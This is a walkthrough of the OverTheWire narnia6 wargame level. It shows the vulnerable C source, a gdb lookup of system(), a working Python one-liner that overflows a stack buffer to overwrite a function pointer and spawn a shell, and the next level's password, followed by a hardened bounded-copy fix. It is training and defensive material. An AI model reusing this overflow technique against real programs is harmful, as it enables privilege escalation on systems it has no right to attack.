[Original] WarGame narnia6 walkthrough
2019-7-31 16:28 6982
The narnia6 source is as follows:
```c
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* added here: declares setreuid()/geteuid(), which the original used without a prototype */

extern char **environ;

// tired of fixing values...
// - morla
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax\n\t"
            "and $0xff000000, %eax"
            );
}

int main(int argc, char *argv[]){
    char b1[8], b2[8];
    int (*fp)(char *)=(int(*)(char *))&puts, i;

    if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

    /* clear environ */
    for(i=0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));
    /* clear argz */
    for(i=3; argv[i] != NULL; i++)
        memset(argv[i], '\0', strlen(argv[i]));

    strcpy(b1,argv[1]);
    strcpy(b2,argv[2]);
    //if(((unsigned long)fp & 0xff000000) == 0xff000000)
    if(((unsigned long)fp & 0xff000000) == get_sp())
        exit(-1);
    setreuid(geteuid(),geteuid());
    fp(b1);

    exit(1);
}
```
At first I thought I could run shellcode with a NOP sled as in narnia2, but when I saw get_sp compared against fp further down (NX), I gave up on that. By feeding in a format string I found I could leak addresses, but unlike narnia5 this level does not run '/bin/sh' directly. Once I noticed that the program calls 'fp(b1)' right before exiting, I more or less had it: make fp point at the system function and set b1 to 'sh'. The first order of business is finding the address of system, which takes a quick session in gdb. The result:
```
narnia6@narnia:/narnia$ gdb -q narnia6
Reading symbols from narnia6...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x80485ac
(gdb) r
Starting program: /narnia/narnia6

Breakpoint 1, 0x080485ac in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e4c850 <system>
(gdb)
```
This should be the simplest way to get the address of system (normally you have to locate libc yourself and compute the offset o(╥﹏╥)o). The final result:
```
narnia6@narnia:/narnia$ ./narnia6 $(python -c 'print "sh;#"+"a"*4+"\x50\xc8\xe4\xf7"') aa
$ whoami
narnia7
$ cat /etc/narnia_pass/narnia7
ahkiaziphu
$
```
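A hardened counterpart to the narnia6 frame, added here as an example; it is not the narnia6 source and not part of the original post. The root cause the walkthrough relies on is that strcpy() copies argv[1] into the 8-byte b1 without any bound, so the bytes after b1 land on fp, and the get_sp() comparison only rejects fp values whose top byte matches the stack, so an address in libc passes it. The fix below keeps the same layout (two 8-byte buffers beside a function pointer) but replaces the unbounded copies with a bounded copy that refuses any argument which does not fit together with its terminating NUL, so fp can no longer be reached no matter what the address check does. The names copy_bounded, hardened_main, accepts and run_with_args are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_LEN 8   /* same capacity as narnia6's b1 and b2 */

/* Copy src into dst (capacity dst_len) only if it fits with its NUL.
   memchr() is bounded by dst_len, so an over-long or unterminated src is
   never scanned further than the destination could hold. Returns 0 on
   success, -1 on rejection; on rejection dst is left empty so a caller
   can never act on a half-copied value. */
int copy_bounded(char *dst, size_t dst_len, const char *src)
{
    const char *nul = (dst_len > 0) ? memchr(src, '\0', dst_len) : NULL;
    if (nul == NULL) {          /* no NUL within dst_len bytes: too long */
        if (dst_len > 0)
            dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);   /* includes the NUL */
    return 0;
}

/* Hardened equivalent of narnia6's main(): same buffers, same function
   pointer, but the arguments are copied with copy_bounded() and the
   program fails closed on anything that does not fit. Returns 0 when
   both arguments were accepted and fp was called, 1 otherwise. */
int hardened_main(int argc, char *argv[])
{
    char b1[BUF_LEN], b2[BUF_LEN];
    int (*fp)(const char *) = puts;   /* stays puts: nothing can overwrite it */

    if (argc != 3) {
        fprintf(stderr, "%s b1 b2\n", argv[0]);
        return 1;
    }
    if (copy_bounded(b1, sizeof b1, argv[1]) != 0 ||
        copy_bounded(b2, sizeof b2, argv[2]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_LEN - 1);
        return 1;
    }
    fp(b1);
    return 0;
}

/* Helper: would this string be accepted into an 8-byte buffer? */
int accepts(const char *s)
{
    char buf[BUF_LEN];
    return copy_bounded(buf, sizeof buf, s);
}

/* Helper: run hardened_main() with a constructed argv of two arguments. */
int run_with_args(const char *a1, const char *a2)
{
    char *argv[] = { "narnia6", (char *)a1, (char *)a2, NULL };
    return hardened_main(3, argv);
}

int main(int argc, char *argv[])
{
    return hardened_main(argc, argv);
}
```

With this change a 7-byte argument such as "sh" or "1234567" is copied exactly as before, while the 12-byte value the walkthrough passes as argv[1] (four bytes of command, four of padding, four of address) is rejected before anything is written to the stack; the same bounded copy is what a reviewer should ask for wherever strcpy() feeds a fixed-size local buffer.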
Summary

This is the wargame's IRC server:
irc.overthewire.org
The channel is #wargames; everyone is welcome to drop in and chat (mostly asking and answering questions). At the moment the channel is mostly non-Chinese speakers, so it also doubles as English practice o(* ̄︶ ̄*)o

Attached are the executable and the source code.